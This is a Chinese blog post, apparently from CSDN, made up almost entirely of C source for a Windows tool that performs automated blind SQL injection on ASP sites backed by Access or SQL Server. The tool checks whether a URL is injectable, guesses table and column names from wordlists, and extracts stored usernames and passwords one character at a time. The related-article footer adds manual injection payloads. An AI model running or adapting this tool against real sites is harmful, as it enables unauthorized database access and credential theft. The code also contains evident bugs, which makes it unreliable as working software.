acsess sql injection code by c

最新推荐文章于 2024-05-19 13:01:37 发布
最新推荐文章于 2024-05-19 13:01:37 发布
阅读量860 收藏
点赞数
分类专栏: 编程技术 文章标签: sql winapi null buffer url internet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/netwindmiss/article/details/646395
版权

//4月20日修改,代码可能比较不规范,没加注释!

#include <windows.h>
#include <winsock.h>
#include <wininet.h>
#include <stdio.h>
#include <string.h>
#include <conio.h>

#pragma comment(lib, "wininet.lib")
typedef struct{  //字段的结构
 char *name;  //字段名
 DWORD  len;   //值长度
 char *dic;  //字典
 char  *cs;   //猜长度或值时所用的串
 char *url;
 char *table; //表名
 int  m;
 int  id;
}ITEM;
typedef struct{
 ITEM uitem;  //用户名 段
 ITEM pitem;//密码  段
}PR;
char buffer[1024*1024];
char flag[30];  //页面错误标志
char *flagr="html";  //页面错误标志HTML
char *GeturlResponse(char *url) //获取页面信息
{
    DWORD dwBytesRead=0;
 memset(buffer,0,sizeof(buffer));
    HINTERNET hNet=InternetOpen("Sql",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
    HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
    BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
 InternetCloseHandle(hUrlFile);
    InternetCloseHandle(hNet);
 return buffer;
}
int Getflag(char *url,char *p1)  //获取页面错误标志 一般出错页面上有/movie.asp等,这里用它做标志
{
 int i;
 char *p=strstr(url,".asp");
 i=0;
 while(*p!='/')
  p--;
 strcpy(p1,p);
 while(p1[i++]!='p');
 p1[i]='/0';
 if(!p1)
 {
  printf("Get flag failed/n/n");
  return 0;
 }
 printf("The flag is %s/n/n",p1);
 return 1;
}
DWORD WINAPI CheckUrl(LPVOID p)      //检查url是否可以被注入
{
 ITEM u=*(ITEM *)p;
 char urlt[1024];
    wsprintf(urlt,"%s'",u.url);
 printf("Geting the %s Response data....../n",urlt);
 if(strstr(GeturlResponse(urlt),flag))
 {
  printf("This url could be injected!/n/n");//如果错误页面含错误标志,可注入
  return 1;
 }
 else
 {
  printf("This url could not be injected!/n");
  return 0;
 }
 return 0;
}
DWORD WINAPI Gettable(LPVOID p)   //猜表名
{
 ITEM  t=*(ITEM *)p;
 FILE  *out;
 char urlt[1024];
 strcpy(urlt,t.url);
 out = fopen("table.txt", "rt");
 if(!out)
 {
  printf("can't open table dic!/n");
  return 0;
 }
 //fseek(out,0, SEEK_SET);
 while(!feof(out))
 {
  memset(t.table,0,sizeof(t.table));
  fgets(t.table,100, out);
  t.table[strlen(t.table)-1]='/0';
  memset(urlt,0,sizeof(urlt));
  wsprintf(urlt,"%s and exists (select * from %s)",t.url,t.table);
  puts(urlt);
  if(!strstr(GeturlResponse(urlt),flag))
  {
   printf("/nWe get the table/nThe table name is %s/n/n",t.table);
   return 1;
  }
 }
 fclose(out);
 return 0;
}
DWORD WINAPI GetItem(LPVOID p)  //猜字段名
{
    ITEM  item=*(ITEM *)p;
 FILE  *out;
 char  urlt[1024];
 strcpy(urlt,item.url);
 out=fopen(item.dic, "rt");
 if(!out)
 {
  printf("can't open %s dic!/n",item.dic);
  return 0;
 }
 //fseek(out,0, SEEK_SET);
 while(!feof(out))
 {
  memset(item.name,0,sizeof(item.name));
  fgets(item.name,30, out);
  item.name[strlen(item.name)-1]='/0';
  memset(urlt,0,sizeof(urlt));
  wsprintf(urlt,"%s and exists (select %s from %s)",item.url,item.name,item.table);
  puts(urlt);
  if(!strstr(GeturlResponse(urlt),flag))
  {
   printf("/nWe get the item/nThe item(username) is %s/n/n",item.name);
   return 1;
  }
  
 }
 fclose(out);
 return 0;
}
DWORD WINAPI GetResult(LPVOID p)            //猜字段长度和字段值
{
    ITEM up=*(ITEM *)p;
 char *urlt;
 int m,mn;
 m=1;
 while(1)
 {  
  urlt=(char *)malloc(1024);
  wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s>%d and %s<%d)",
   up.url,up.table,up.id,up.cs,m,up.cs,up.m);
  puts(urlt);
  if(strstr(GeturlResponse(urlt),flag))
  {
   printf("We can't get the %s/n",up.cs);
   return 0;
  }
  else
  {
   mn=(m+(up.m))/2;
   urlt=(char *)malloc(1024*2);
   wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s=%d)",up.url,up.table,up.id,up.cs,mn);
   puts(urlt);
   if(!strstr(GeturlResponse(urlt),flag)&&strstr(GeturlResponse(urlt),flagr))
   {
    printf("The %s %s is %d/n/n",up.name,up.cs,mn);
    return mn;
   }
   urlt=(char *)malloc(1024*2);
   wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s>%d)",up.url,up.table,up.id,up.cs,mn);
   puts(urlt);
   if(strstr(GeturlResponse(urlt),flag)||!strstr(GeturlResponse(urlt),flagr))
    up.m=mn;
   else
    m=mn;
  }
 }
 return 0;
}
DWORD WINAPI GetMinId(LPVOID p)
{
 ITEM ID=*(ITEM *)p;
 int id;
 id=1;
 char *urlt;
 while(id<8000)
 {
  urlt=(char *)malloc(1024);
  wsprintf(urlt,"%s and exists (select id from %s where id=%d)",ID.url,ID.table,id);
  puts(urlt);
  if(strstr(GeturlResponse(urlt),flag)){id++;printf("%d/n",id);}
  else
  {
   
   if(strstr(strlwr(GeturlResponse(urlt)),flagr))
   {printf("The min id is %d/n",id);
   return id;}
   else id++;
  }
 }
 return -1;
}
int main(int argc,char **argv)
{
if(argc<2)
{
printf("Useage:inject.exe http://www.xxx.net/movie.asp?id=1 userid(a number)/n");
printf("example:inject.exe http://www.xxx.net/movie.asp?id=1 1/n");
printf("        if userid is 1,then you will get the username and password /n/twhose id is 1./n");
printf("        If you don't give userid ,the id will be the minist id./n");
return 0;
}
 PR p;
 DWORD threadId,exitid;
 DWORD uexit,pexit;
 HANDLE hThrd1[40],hThrd2[40];
 int type;
 char *ptr,*url,*urlt;
 url=argv[1];
 urlt=(char *)malloc(80);
 wsprintf(urlt,"%s'",url);   
 if(ptr=strstr(GeturlResponse(urlt),"SQL"))  //判断哪种类型的数据库
  type=0; //sql
 else
  type=1;//access
 p.uitem.table=(char *)malloc(20);
 p.pitem.table=(char *)malloc(20);
 p.uitem.name=(char *)malloc(30);
 p.pitem.name=(char *)malloc(30);
 p.uitem.dic=(char *)malloc(10);
 p.pitem.dic=(char *)malloc(10);
    p.uitem.cs=(char *)malloc(200);
 p.pitem.cs=(char *)malloc(200);
 p.uitem.url=url;
 p.pitem.url=url;
 p.uitem.dic="user.txt";
 p.pitem.dic="pass.txt";
 p.uitem.m=32;
 p.pitem.m=32;
 p.uitem.len=0;
 p.pitem.len=0;
 p.uitem.id=1;
 p.pitem.id=1;

 memset(flag,0,sizeof(flag));
 Getflag(p.uitem.url,flag);
 if(!flag)
 {
  printf("Can't get the flag/n/n");
  return 0;
 }
 hThrd1[0]=CreateThread(NULL,0,CheckUrl,(LPVOID )&p.uitem,0,&threadId);
 WaitForSingleObject(hThrd1[0],INFINITE);
 GetExitCodeThread(hThrd1[0],&exitid);
 CloseHandle(hThrd1[0]);
 if(!exitid)
  return 0;
 hThrd1[0]=CreateThread(NULL,0,Gettable,(LPVOID )&p.uitem,0,&threadId);
 WaitForSingleObject(hThrd1[0],INFINITE);
 GetExitCodeThread(hThrd1[0], &exitid);
 if(!exitid)
 {
  printf("Can't get the talbe name/n");
  return 0;
 }
 strcpy(p.pitem.table,p.uitem.table);
 hThrd1[0]=CreateThread(NULL,0,GetItem,(LPVOID )&p.uitem,0,&threadId);
 WaitForSingleObject(hThrd1[0],INFINITE);
 GetExitCodeThread(hThrd1[0], &uexit);
 if(!uexit)
  printf("We can't get the user item/n");
 hThrd1[0]=CreateThread(NULL,0,GetItem,(LPVOID )&p.pitem,0,&threadId);
 WaitForSingleObject(hThrd1[0],INFINITE);
 GetExitCodeThread(hThrd1[0], &pexit);
 if(!pexit)
  printf("We can't get the pass item/n");
 hThrd1[0]=CreateThread(NULL,0,GetMinId,(LPVOID )&p.uitem,0,&threadId);
 WaitForSingleObject(hThrd1[0],INFINITE);
 GetExitCodeThread(hThrd1[0],&exitid);
 CloseHandle(hThrd1[0]);
 p.uitem.id=exitid;
 p.pitem.id=exitid;
 printf("%d/n",argc);
 if(argc>2)
 {
  if(argv[2])
  {
   if(atoi(argv[2])<p.uitem.id)
    printf("The id you gived is less than min id or is not a number,/n/twe will use id as %d/n",p.uitem.id);
   else
   {
    p.uitem.id=atoi(argv[2]);
    p.pitem.id=atoi(argv[2]);
    printf("We will guest the user whose id is %d/n",atoi(argv[2]));
   }
  }
 }
 
 if(exitid==-1)
 {
  printf("Get min id failed /n");
  return 0;
 }
 wsprintf(p.uitem.cs,"len(%s)",p.uitem.name);
 wsprintf(p.pitem.cs,"len(%s)",p.pitem.name);
 if(uexit)
 {
  hThrd1[0]=CreateThread(NULL,0,GetResult,(LPVOID )&p.uitem,0,&threadId);
  WaitForSingleObject(hThrd1[0],INFINITE);
  GetExitCodeThread(hThrd1[0], &p.uitem.len);
 }
 if(pexit)
 {
  hThrd2[0]=CreateThread(NULL,0,GetResult,(LPVOID )&p.pitem,0,&threadId);
  WaitForSingleObject(hThrd2[0],INFINITE);
  GetExitCodeThread(hThrd2[0], &p.pitem.len);
 }
 printf("len(u) is %d/nlen(p) is %d/n/n",p.uitem.len,p.pitem.len);
 p.uitem.m=128;
 p.pitem.m=128;
 DWORD pnum=0;
 DWORD username[17];
 DWORD password[17];
 memset(username,0,sizeof(username));
 memset(password,0,sizeof(password));
 while(pnum<p.pitem.len||pnum<p.pitem.len)
 {
  p.uitem.cs=(char *)malloc(200);
  p.pitem.cs=(char *)malloc(200);
  if(type==1)
  {
   wsprintf(p.uitem.cs,"asc(mid(%s,%d,1))",p.uitem.name,pnum+1);
   wsprintf(p.pitem.cs,"asc(mid(%s,%d,1))",p.pitem.name,pnum+1);
  }
  else
  {
   wsprintf(p.uitem.cs,"unicode(substring(%s,%d,1))",p.uitem.name,pnum+1);
   wsprintf(p.pitem.cs,"unicode(substring(%s,%d,1))",p.pitem.name,pnum+1);
  }
  
  if(pnum<p.uitem.len&&uexit)
  {
   hThrd1[pnum]=CreateThread(NULL,0,GetResult,(LPVOID )&p.uitem,0,&threadId);
   WaitForSingleObject(hThrd1[pnum],INFINITE);
   GetExitCodeThread(hThrd1[pnum],&username[pnum]);
   CloseHandle(hThrd1[pnum]);
  }
  if(pnum<p.pitem.len&&pexit)
  {
   hThrd2[pnum]=CreateThread(NULL,0,GetResult,(LPVOID )&p.pitem,0,&threadId);
   WaitForSingleObject(hThrd2[pnum],INFINITE);
   GetExitCodeThread(hThrd2[pnum],&password[pnum]);
   CloseHandle(hThrd2[pnum]);
  }
  pnum++;
 }
 if(!uexit)
  printf("We can't get username/n");
 else
 {
  printf("/nusername is:",p.uitem.len);
  for(pnum=0;pnum<p.uitem.len;pnum++)
   printf("%c",username[pnum]);
  printf("/n");
 }
 if(!pexit)
  printf("We can't get password/n");
 else
 {
  printf("/npassword is:",p.pitem.len);
  for(pnum=0;pnum<p.pitem.len;pnum++)
   printf("%c",password[pnum]);
 }
 printf("/nGet ret ok!/n");

 return 1;
}

 

 

netwindmiss
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web Security.pdf
09-24
Programmers worked hard to amend the loopholes in the system and to contain the attacks, as otherwise hackers can access important and sensitive data through SQL injection attacks and can even access ...
Access数据库SQL注入(Access SQL Injection)
weixin_33753845的博客
03-22 194
一、MicrosoftOffice Access数据库手工注入语句 1、参数后面加 ’ 、and 1=1、and 1=2看返回状态判断是否存在注入点2、参数后面加 and exists(select*from admin)猜表名 返回正常页面表示存在(admin)3、参数后面加 and exists(selectusername from admin)猜(admin)表中是否存在列...
20181020学习笔记——解决的第一个Reverse题目
XiaoXuM_LXM的博客
10-21 2339
解决的第一个Reverse题目 题目描述 题目给了一个名为rev1的文件,没有后缀。 文件的下载地址: 结题过程 第一次做Reverse题目,一脸蒙蔽,我首先尝试把后缀改为.exe,结果,不能运行。。。。可能不是Windows系统文件。 我转到虚拟机里,打开Linux系统,执行“file rev1”,结果,果然是Linux下的可执行文件,是ELF文件。 然后我在终端执行“./rev1...
webgoat-(A1)SQL Injection
seanyang_的博客
11-05 959
SQL 命令主要分为三类:数据操作语言 (DML)DML 语句可用于请求记录 (SELECT)、添加记录 (INSERT)、删除记录 (DELETE) 和修改现有记录 (UPDATE)。如果攻击者成功地将 DML 语句“注入”到 SQL 数据库中,则可能会破坏系统的机密性(使用 SELECT 语句)、完整性(使用 UPDATE 语句)和可用性(使用 DELETE 或 UPDATE 语句)数据定义语言 (DDL)DDL 命令通常用于定义数据库的架构。
Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程
技术分享
07-24 1426
Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程
SQL injection, XSS, CSRF
Anything that can make the world better is promising!
06-25 66
SQL injection, XSS, CSRF
sql injection violation, delete not allow
x1210128068的博客
03-27 2229
org.springframework.jdbc.UncategorizedSQLException: ### Error updating database. Cause: java.sql.SQLException: sql injection violation, delete not allow : DELETE FROM t_user ### SQL: DELETE FROM t_us...
SQL Injection
chenqunan3231的博客
03-09 119
SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and exec...
Caused by: java.sql.SQLException: sql injection violation, syntax error: ERROR. token : DESC
热门推荐
duantianya2012的博客
01-16 8万+
Caused by: java.sql.SQLException: sql injection violation, syntax error: ERROR. token : DESC, pos : 47 : SELECT id,odbcconfig,ip,port,user,password,desc  FROM hh_config.hh_dbconfig 问题在于DESC是sql的自有字
Cause: java.sql.SQLException: sql injection violation, syntax error: ERROR. token CLOSE
wy15027539821的博客
04-30 5400
报错信息 Cause: java.sql.SQLException: sql injection violation, syntax error: ERROR. pos 39, line 2, column 24, token CLOSE,主要包括mysql报错:Cause: java.sql.SQLException: sql injection violation, syntax error:...
Pivotal Certified Professional Spring Developer Exam(Apress,2016)
12-28
Pass the Pivotal Certified Professional exam using source code examples, study summaries, and mock exams. In this book, you’ll find a descriptive overview of certification-related Spring modules and ...
MySql存储过程编程.chm
05-07
Stored Programs and Code Injection Section 18.4. Conclusion Chapter 19. Tuning Stored Programs and Their SQL Section 19.1. Why SQL Tuning Is So Important Section 19.2. How MySQL Processes SQL...
Securing PHP Web Applications.pdf
08-18
Prevent Buffer Overflows by Sanitizing Variables 46 Premise: Data Is Guilty Until Proven Innocent, Especially If It Comes from Outside the Application 46 Where Does Data Come From? 48 How to Sanitize...
CE中文版-启点CE过NP中文.exe
01-02
DLL injection: On DLL injection failure CE tries to fall back on forced injection methods Assembler: Added multibyte NOP Plugins: Plugins can now have side dll's that are statically linked in their ...
网络编程学习--简单的端口扫描
修养生息,以得佳境
04-20 930
#include #include // 编译时需使用的库 #pragma comment(lib,"wsock32.lib") int main(int argc, char *argv[]) {  WSADATA wsadata;  int sock;  int port=0; struct sockaddr_in server;   char *ip=argv[1]; // 创建一个so
汇编分析-改c
修养生息,以得佳境
08-25 890
 10001819  |.  FF15 1C500210 CALL DWORD PTR DS:[; /GetPrivateProfileStringW1000181F  |.  8BBC24 140800>MOV EDI,DWORD PTR SS:[ESP+814]10001826  |.  33D2          XOR EDX,EDX10001828  |.  85FF        
自愉自乐的小程序
修养生息,以得佳境
08-25 833
#include #include #include typedef struct{ char l;  //左半字符 char r;//右半字符}hz;void main(int argc,char **argv){ FILE *p; FILE *p1; int i; hz  h[100]; if(argc {  printf("useage:please enter the file name
父子级分类统计分类下数量sql
最新发布
pscool的博客
05-19 70
代码】父子级分类统计分类下数量sql
sql injection
03-29
SQL injection is a type of cyber attack where an attacker injects malicious SQL statements into a database query through a vulnerable website or application. The goal is to manipulate the database ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值